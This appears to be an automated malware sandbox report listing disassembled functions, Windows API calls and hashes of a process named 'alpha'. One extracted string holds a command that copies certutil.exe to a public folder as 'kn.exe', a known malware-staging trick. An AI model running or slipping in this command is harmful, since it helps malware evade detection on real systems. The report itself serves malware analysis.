                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                          • String ID:
                                                                                          • API String ID: 3541575487-0
                                                                                          • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                          • Instruction ID: 18c5ed0258da19eec1aa3b257fa8e119d0a901afb5ac80d858bd8b5801508dbc
                                                                                          • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                          • Instruction Fuzzy Hash: 12A14871B1A39761EE249F6594942BDA291FF49BE0F444234EEAEC77C4EE3CE445A300
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                            • Part of subcall function 00007FF6A0E7CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          • _pipe.MSVCRT ref: 00007FF6A0E76C1E
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E76CD1
                                                                                          • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF6A0E76CFB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                                                          • String ID:
                                                                                          • API String ID: 624391571-0
                                                                                          • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                          • Instruction ID: 4e91ac35c67acd9657ed0f3fac6f009b9de37c2f49fae842ddac4867cf809049
                                                                                          • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                          • Instruction Fuzzy Hash: 9E719B32E0A743A6E754AF35D84017976A1FF89764F188238DA5DD63E7CF3CA842A740
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                          • String ID:
                                                                                          • API String ID: 4268342597-0
                                                                                          • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                          • Instruction ID: 371fed3cb827ede49506a4736e7ab513ca2764a0ff35cb7a10b78db00b2956c8
                                                                                          • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                          • Instruction Fuzzy Hash: AE815D32A0AB83A2EB648F25A540239B7A0FF89BC4F188136DD5D87755DF7DE481E740
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: OpenToken$CloseProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2991381754-0
                                                                                          • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                          • Instruction ID: 9f0bb0e682cb894b59bfdf03910af521afb08ea46a428f6707cef5f8a39c763f
                                                                                          • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                          • Instruction Fuzzy Hash: C8219C32A09683ABE7509BA4D5402BDB7A0FB897A1F504135EF5D83794DF7CE848DB00
                                                                                          APIs
                                                                                          • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF6A0E9C59E), ref: 00007FF6A0E75879
                                                                                            • Part of subcall function 00007FF6A0E758D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E75903
                                                                                            • Part of subcall function 00007FF6A0E758D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E75943
                                                                                            • Part of subcall function 00007FF6A0E758D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E75956
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValueVersion
                                                                                          • String ID: %d.%d.%05d.%d
                                                                                          • API String ID: 2996790148-3457777122
                                                                                          • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                          • Instruction ID: d6c311c2cba31621f289cca04bab0352a001ce5288981b059efdb44ec95f79af
                                                                                          • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                          • Instruction Fuzzy Hash: 3DF0A072A08382A7D3109F25B44006AAAA1FBC8781F548138EA8A47B5ACF3CD524CB40
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$ErrorFileFindFirstLast
                                                                                          • String ID:
                                                                                          • API String ID: 2831795651-0
                                                                                          • Opcode ID: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                                                          • Instruction ID: df554377f6ba9bbac17814c4ae576d52d07596fcacaabb57805c1585e2cd96c9
                                                                                          • Opcode Fuzzy Hash: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                                                          • Instruction Fuzzy Hash: 10D1E472B0A683A6E764CF21E4802BA77A1FB84794F105135DE8E87794DF3CE559D700
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00007FF6A0E77DA1
                                                                                            • Part of subcall function 00007FF6A0E8417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6A0E841AD
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D46E
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D485
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D4EE
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: iswspace.MSVCRT ref: 00007FF6A0E7D54D
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D569
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D58C
                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E77EB7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                                          • String ID:
                                                                                          • API String ID: 168394030-0
                                                                                          • Opcode ID: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                                                          • Instruction ID: 869abfded15aab2f43a994c03258b30962950d124291ab5c021d3f37a53afd3a
                                                                                          • Opcode Fuzzy Hash: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                                                          • Instruction Fuzzy Hash: BDA1C431F0A683A5FB648B2599502BA23A1FF85784F444135DE5EC7BE6EF3CE449A700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQueryToken
                                                                                          • String ID:
                                                                                          • API String ID: 4239771691-0
                                                                                          • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                          • Instruction ID: 887235125445508f6b895670384f62b2d4eaeb42621d137eca30ec132e5fff38
                                                                                          • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                          • Instruction Fuzzy Hash: 02113C72A197C2DBEB508F01E5003A9BBA4FB85796F108172DF48827A4DF7DE588CB40
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileInformation$HandleQueryVolume
                                                                                          • String ID:
                                                                                          • API String ID: 2149833895-0
                                                                                          • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                          • Instruction ID: af9bbde53391ced2f5f23dd3862675c368395fbc40175c60249f7d05804002ef
                                                                                          • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                          • Instruction Fuzzy Hash: 0411703260A7C29AEB608B60F5443AEB7A0FB88B84F545131DA9D82B55DFBCD44DDB00
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D46E
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D485
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D4EE
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: iswspace.MSVCRT ref: 00007FF6A0E7D54D
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D569
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D58C
                                                                                          • towupper.MSVCRT ref: 00007FF6A0E785D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                                                          • String ID:
                                                                                          • API String ID: 3520273530-0
                                                                                          • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                          • Instruction ID: 49874f4cbed7aa9f4880593032fe98deb64e1c7151b347011e2451003572a72d
                                                                                          • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                          • Instruction Fuzzy Hash: CE61C232A0E243A6F7A49F24D61437D76A0FB18754F408136DA5ED63E6DF3CA898A311
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQueryToken
                                                                                          • String ID:
                                                                                          • API String ID: 4239771691-0
                                                                                          • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                          • Instruction ID: b9cb35f2638333136298c8e016304dd7bc5ba7495e1390c5856d96dff6cb7807
                                                                                          • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                          • Instruction Fuzzy Hash: 5FF030B3704B82DBD7008F64E58449CB778FB48B85765853ACB2C43704DB75D9A4CB40
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E893BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                          • Instruction ID: 608afb785f915cb69698ec3823be8458c5cbb91fa07cded82a20d6617b89a6dd
                                                                                          • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                          • Instruction Fuzzy Hash: 76B00264E66443F2D608AB759C9506512A07B5C711FE51472D10EC5260DE5D959B9700
                                                                                          APIs
                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF6A0E7F52A,00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F8DE
                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F8FB
                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F951
                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F96B
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7FA8E
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E7FB14
                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7FB2D
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7FBEA
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E7F996
                                                                                            • Part of subcall function 00007FF6A0E80010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF6A0E9849D,?,?,?,00007FF6A0E9F0C7), ref: 00007FF6A0E80045
                                                                                            • Part of subcall function 00007FF6A0E80010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6A0E9F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E80071
                                                                                            • Part of subcall function 00007FF6A0E80010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E80092
                                                                                            • Part of subcall function 00007FF6A0E80010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6A0E800A7
                                                                                            • Part of subcall function 00007FF6A0E80010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6A0E80181
                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E8D401
                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E8D41B
                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E8D435
                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E8D480
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                          • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                          • API String ID: 3964947564-518410914
                                                                                          • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                          • Instruction ID: af844d54baaf80bf6efb525ad1f19496aeafac29abced1fac8f7dcede3f32ddb
                                                                                          • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                          • Instruction Fuzzy Hash: 5C026931A0F643F6FA549B21E950278B7A1FF897A5F648135D91EC27A2DF3CA415E300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
